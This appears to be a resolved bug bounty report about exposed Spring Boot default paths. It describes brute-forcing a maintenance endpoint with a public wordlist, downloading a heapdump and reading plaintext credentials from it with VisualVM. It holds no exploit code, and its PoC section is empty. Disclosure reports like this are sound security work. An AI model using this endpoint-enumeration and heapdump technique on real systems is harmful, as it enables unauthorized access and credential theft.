Name: Sensitive Information disclosure via Spring Boot Default Paths
Rating: 2.1 (9323 reviews)
Author: c4ng4c31r0

Reward: $250
Program: Private

Overview of the Vulnerability
Disclosure of secrets for a publicly available asset occurs when sensitive data is not behind an authorization barrier. When this information is exposed it can place sensitive data, such as secrets, at risk. This can occur due to a variety of scenarios such as not encrypting data, secrets committed to GitHub within public repositories, or exposed external assets. Disclosure of secrets for publicly available assets could be leveraged by an attacker to gain privileged access to the application or the environment where the application is hosted. From here, an attacker could execute functions under the guise of an Administrator user, depending on the permissions level they are able to access.

Business Impact
Disclosure of secrets for a publicly available asset can lead to indirect financial loss due to an attacker accessing, deleting, or modifying data from within the application. Reputational damage for the business can also occur via the impact to customers’ trust that these events create. The severity of the impact to the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.

Steps to reproduce:
1 - Use the wordlist [https://github.com/emadshanab/DIR-WORDLISTS/blob/main/spring-boot.txt] to perform a brute force attack on the https://c4ng4c31r0[.]com/api/maintenance/ endpoint.
2 - Note that the heapdump endpoint was identified. When accessing it, an automatic download is performed containing a binary file.
Using visualvm https://visualvm.github.io/, we can read the contents of the file in plain text.

PoC
Using visualvm to decompile and read plain text credentials:

Status/Reward:
Resolved!